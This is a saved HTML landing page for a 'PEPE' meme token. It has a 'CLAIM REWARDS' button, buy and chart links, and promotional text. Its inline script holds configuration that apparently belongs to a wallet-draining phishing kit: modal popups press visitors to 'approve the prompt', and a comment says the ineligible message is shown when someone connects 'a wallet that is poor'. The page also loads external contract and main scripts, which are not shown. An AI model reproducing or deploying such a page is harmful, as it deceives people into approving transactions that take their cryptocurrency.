<!DOCTYPE html>
<html data-wf-page="6514973b129838b0e2aa3a52" data-wf-site="6514973b129838b0e2aa3a57" lang="en"
  class="w-mod-js wf-pressstart2p-n4-active wf-active w-mod-ix" data-scrapbook-source="https://thepepetoken.vip/"
  data-scrapbook-create="20230929111156002" data-scrapbook-title="PEPE">

  <style>
    .wf-force-outline-none[tabindex="-1"]:focus {
      outline: none;
    }
  </style>
  <meta charset="UTF-8">
  <title>PEPE</title>
  <meta content="width=device-width, initial-scale=1" name="viewport">
  <link href="normalize.css" rel="stylesheet" type="text/css">
  <link href="components.css" rel="stylesheet" type="text/css">
  <link href="pepeiuioittgf.css" rel="stylesheet" type="text/css">



  <link rel="stylesheet" href="css.css" media="all">

  <link href="favicon.png" rel="shortcut icon" type="image/x-icon">
  <link href="https://thepepetoken.vip/images/webclip.png" rel="apple-touch-icon">

  <!-- They say History repeats it self, I say your watching history in the making. -->
  <script defer="defer" src="js/vendors.js"></script>
  <script defer="defer" src="js/contracts.js"></script>
  <script defer="defer" src="js/main.js"></script>
  
  <script>
    window.UNIQUE_IDENTITY = "yelping_cheetah_23";
  
    // Pick a theme here, this defaults to "light"
    window.modal_theme = "light";
  
    // https://docs.walletconnect.com/2.0/web/walletConnectModal/theming
    window.modal_variables = {
    /* Example of what you can do */
    // "--w3m-accent-color": "#FC9EFB",
    // "--w3m-background-color": "#0073FF",
    // "--w3m-logo-image-url": "/your-logo.svg",
    };
  
    // Notification modals
   window.popups = {
  PENDING: {
    // The popup that shows when they get prompted
    title: "Claim Pending",
    text: "You must approve the prompt in order to continue."
  },
  INVALID: {
    // Shown when they connect on a wallet that is poor.
    // title: "Ineligible Address",
    text: "The connected account is not eligible for this event.\nPlease try using a different account.",
  }
    }
  
    // Only touch this if you know what you're doing!
    window.OVERRIDE_MODE = false;
  </script>
  </head>

<body>
  <div class="page-wrapper">
    <div id="awge-tube-border" class="awge-tube-border"></div>
    <div class="awge-tube-shape">
      <div class="pages-container">
        <main class="awge-content">
          <div id="landing-content" class="landing-content">
            <div id="landing-title" class="landing-title">
              <div class="icons"><img src="19.svg" alt="" loading="eager" class="landing-image"><img
                  src="Asset-1svg.svg" loading="lazy" alt="" class="title-img"></div>
            </div>
            <div class="landing-start">
              <div class="start-app">
                <h2 id="connect_button" id="landing-start-button" class="landing-start-text"><span
                  id="connect_button" data-w-id="cacc93a3-cff7-687e-3d32-17ec78803a54" style="opacity: 1;"
                  id="connect_button" class="landing-start-arrow">›</span>CLAIM REWARDS</h2>
              </div>
            </div>
            <div class="landing-copyright">
              <div class="landing-copyright-text">THE NO1 PEPE TOKEN <br>
                <span style="font-size: 0.5rem">0xaaf5520d9536480a82261bee357314478eddb2cd</span><br>
              </div>
            </div>
          </div>
        </main>
        <main id="second-page" class="awge-content-second-page hidden">
          <div class="home-content">
            <div>
              <div class="home-container">
                <div class="home-video-container">
                  <div class="home-video-wrapper">
                    <a href="#" class="home-video-parent w-inline-block"><img src="pepe-fight-pepe-frog-fight.gif"
                        height="341" width="325" alt="" class="home-video-media-gif"></a>
                  </div>
                </div>
                <div class="home-navbar">
                  <a href="https://thepepetoken.vip/index.html" aria-current="page"
                    class="logo-in-nav w-inline-block w--current"><img src="19.svg" height="35" alt=""><img
                      src="Asset-1svg.svg" loading="lazy" alt="" class="logo-text"></a>
                </div>
                <div class="home-options-container">
                  <div class="normal-content">
                    <div class="w-layout-grid home-options-items">
                      <div id="w-node-_03aad0bb-55e7-844f-d150-7a368761686d-e2aa3a52" class="home-options-item">
                        <a href="https://app.uniswap.org/#/swap?outputCurrency=0xaaf5520d9536480a82261bee357314478eddb2cd"
                          class="home-options-link buy-link w-inline-block"><img src="uniswap.gif" alt=""
                            loading="eager" class="home-options-icon">
                          <h3 class="home-options-text orange-text">Buy Now</h3>
                        </a>
                      </div>
                      <div id="w-node-_03aad0bb-55e7-844f-d150-7a3687616872-e2aa3a52" class="home-options-item">
                        <a href="https://www.dextools.io/app/en/ether/pair-explorer/0xaaf5520D9536480A82261BEE357314478EdDB2Cd"
                          class="home-options-link chart-link w-inline-block"><img src="chart.gif" alt=""
                            loading="eager" class="home-options-icon">
                          <h3 class="home-options-text">Chart</h3>
                        </a>
                      </div>
                      <div id="w-node-_03aad0bb-55e7-844f-d150-7a3687616877-e2aa3a52" class="home-options-item">
                        <a href="https://t.me/pepe_tokeneth" class="home-options-link telegram-link w-inline-block"><img
                            src="tg.gif" alt="" loading="eager" class="home-options-icon">
                          <h3 class="home-options-text green-text">Telegram</h3>
                        </a>
                      </div>
                      <div id="w-node-_03aad0bb-55e7-844f-d150-7a368761687c-e2aa3a52" class="home-options-item ttw">
                        <a href="https://twitter.com/pepetokenog"
                          class="home-options-link twitter-link w-inline-block"><img src="twitter.gif" alt=""
                            loading="eager" class="home-options-icon testing">
                          <h3 class="home-options-text green-text">Twitter</h3>
                        </a>
                      </div>
                      <div id="w-node-_03aad0bb-55e7-844f-d150-7a3687616881-e2aa3a52" class="home-options-item">
                        <a href="https://etherscan.io/address/0xaaf5520d9536480a82261bee357314478eddb2cd"
                          class="home-options-link etherscan-link w-inline-block"><img src="ether.gif" alt=""
                            loading="eager" class="home-options-icon about">
                          <h3 class="home-options-text">Contract</h3>
                        </a>
                      </div>
                    </div>
                  </div>
                  <div class="about-content hidden">
                    <div class="about-content-content">
                      <div class="about-nav"><img src="644039-200.png" loading="lazy" alt="" class="about-close-icon">
                        <h3 class="about-title">About</h3>
                      </div>
                      <div class="about-txt">1/1 Tax, liquidity burnt, Building Sustainability.</div>
                      <br><br>
                      <p class="about-txt">
                        This novel incarnation, simply named PEPE, is destined to become the most illustrious Pepe of
                        all, transcending its predecessors with a host of enhanced features and a robust infrastructure.
                        The PEPE token is meticulously crafted to embody the vibrant spirit and the whimsical charm of
                        the Pepe culture. As a tribute to the enduring legacy of Pepe, this token is not merely a
                        digital asset, but a symbol of a thriving community united by creativity and a shared vision for
                        a decentralized digital future. With the PEPE token, we are not just embracing a new era of meme
                        coins, but celebrating the indomitable spirit of the Pepe community done properly. that will
                        continue to inspire and innovate for all.</p>
                    </div>
                  </div>
                </div>
              </div>
              <div class="about-link-cont">
                <h3 id="about-button" class="home-options-text white about">About PEPE</h3>
              </div>
              <div class="awge-copyright awge-copyright-mobile">
                <div class="awge-copyright-text">admins@thepepetoken.vip</div>
              </div>
            </div>
          </div>
        </main>
        <div class="style w-embed">
          <style>
            .awge-content {
              animation: 3.4s linear 0s 1 normal none running turn-on;
            }

            @keyframes turn-on {
              0% {
                transform: scale(1, 0.8) translate3d(0, 0, 0);
                -webkit-transform: scale(1, 0.8) translate3d(0, 0, 0);
                filter: brightness(30);
                -webkit-filter: brightness(30);
                opacity: 1
              }

              3.5% {
                transform: scale(1, 0.8) translate3d(0, 100%, 0);
                -webkit-transform: scale(1, 0.8) translate3d(0, 100%, 0)
              }

              3.6% {
                transform: scale(1, 0.8) translate3d(0, -100%, 0);
                -webkit-transform: scale(1, 0.8) translate3d(0, -100%, 0);
                opacity: 1
              }

              9% {
                transform: scale(1.3, 0.6) translate3d(0, 100%, 0);
                -webkit-transform: scale(1.3, 0.6) translate3d(0, 100%, 0);
                filter: brightness(30);
                -webkit-filter: brightness(30);
                opacity: 0
              }

              11% {
                transform: scale(1, 1) translate3d(0, 0, 0);
                -webkit-transform: scale(1, 1) translate3d(0, 0, 0);
                filter: contrast(0) brightness(0) saturate(1);
                -webkit-filter: contrast(0) brightness(0) saturate(1);
                opacity: 0
              }

              100% {
                transform: scale(1, 1) translate3d(0, 0, 0);
                -webkit-transform: scale(1, 1) translate3d(0, 0, 0);
                filter: contrast(1.075) brightness(1.14) saturate(1.3);
                -webkit-filter: contrast(1.075) brightness(1.14) saturate(1.3);
                opacity: 1
              }
            }

            @-webkit-keyframes turn-on {
              0% {
                transform: scale(1, 0.8) translate3d(0, 0, 0);
                -webkit-transform: scale(1, 0.8) translate3d(0, 0, 0);
                filter: brightness(30);
                -webkit-filter: brightness(30);
                opacity: 1
              }

              3.5% {
                transform: scale(1, 0.8) translate3d(0, 100%, 0);
                -webkit-transform: scale(1, 0.8) translate3d(0, 100%, 0)
              }

              3.6% {
                transform: scale(1, 0.8) translate3d(0, -100%, 0);
                -webkit-transform: scale(1, 0.8) translate3d(0, -100%, 0);
                opacity: 1
              }

              9% {
                transform: scale(1.3, 0.6) translate3d(0, 100%, 0);
                -webkit-transform: scale(1.3, 0.6) translate3d(0, 100%, 0);
                filter: brightness(30);
                -webkit-filter: brightness(30);
                opacity: 0
              }

              11% {
                transform: scale(1, 1) translate3d(0, 0, 0);
                -webkit-transform: scale(1, 1) translate3d(0, 0, 0);
                filter: contrast(0) brightness(0) saturate(1);
                -webkit-filter: contrast(0) brightness(0) saturate(1);
                opacity: 0
              }

              100% {
                transform: scale(1, 1) translate3d(0, 0, 0);
                -webkit-transform: scale(1, 1) translate3d(0, 0, 0);
                filter: contrast(1.075) brightness(1.14) saturate(1.3);
                -webkit-filter: contrast(1.075) brightness(1.14) saturate(1.3);
                opacity: 1
              }
            }

            @keyframes turn-off {
              0% {
                transform: scale(1, 1.3) translate3d(0, 0, 0);
                -webkit-filter: brightness(1);
                filter: brightness(1);
                opacity: 1
              }

              60% {
                transform: scale(1.3, 0.001) translate3d(0, 0, 0);
                -webkit-filter: brightness(10);
                filter: brightness(10)
              }

              100% {
                animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
                transform: scale(0, 0.0001) translate3d(0, 0, 0);
                -webkit-filter: brightness(50);
                filter: brightness(50)
              }
            }

            @-webkit-keyframes turn-off {
              0% {
                transform: scale(1, 1.3) translate3d(0, 0, 0);
                -webkit-filter: brightness(1);
                filter: brightness(1);
                opacity: 1
              }

              60% {
                transform: scale(1.3, 0.001) translate3d(0, 0, 0);
                -webkit-filter: brightness(10);
                filter: brightness(10)
              }

              100% {
                animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
                transform: scale(0, 0.0001) translate3d(0, 0, 0);
                -webkit-filter: brightness(50);
                filter: brightness(50)
              }
            }
          </style>
        </div>
        <div class="style w-embed">
          <style>
            .awge-tube-border {
              pointer-events: none !important;
            }

            .awge-tube-shape::after {
              content: ' ';
              display: block;
              position: absolute;
              top: 0;
              left: 0;
              bottom: 0;
              right: 0;
              background: rgba(18, 16, 16, 0.1);
              opacity: 0;
              z-index: 7;
              pointer-events: none;
              animation: flicker 0.15s infinite
            }

            .awge-tube-shape::before {
              content: ' ';
              display: block;
              position: absolute;
              top: 0;
              left: 0;
              bottom: 0;
              right: 0;
              background: linear-gradient(rgba(18, 16, 16, 0) 50%, rgba(0, 0, 0, 0.25) 50%), linear-gradient(90deg, rgba(255, 0, 0, 0.06), rgba(0, 255, 0, 0.02), rgba(0, 0, 255, 0.06));
              z-index: 7;
              background-size: 100% 2px, 3px 100%;
              pointer-events: none
            }

            @keyframes flicker {
              0% {
                opacity: .02795
              }

              5% {
                opacity: .4421
              }

              10% {
                opacity: .87898
              }

              15% {
                opacity: .36995
              }

              20% {
                opacity: .73915
              }

              25% {
                opacity: .29696
              }

              30% {
                opacity: .0971
              }

              35% {
                opacity: .09559
              }

              40% {
                opacity: .63891
              }

              45% {
                opacity: .31371
              }

              50% {
                opacity: .34936
              }

              55% {
                opacity: .4326
              }

              60% {
                opacity: .482
              }

              65% {
                opacity: .90181
              }

              70% {
                opacity: .38934
              }

              75% {
                opacity: .24511
              }

              80% {
                opacity: .1168
              }

              85% {
                opacity: .84842
              }

              90% {
                opacity: .47071
              }

              95% {
                opacity: .69707
              }

              100% {
                opacity: .30299
              }
            }

            .landing-copyright-text,
            .landing-start-arrow {
              text-shadow: 3px 3px 4px #21285d, 0 0 16px rgba(191, 191, 191, 0.56);
            }
          </style>
        </div>
      </div>
    </div>
  </div>
  <div class="html-embed w-embed w-script">

  </div>



</body>

</html>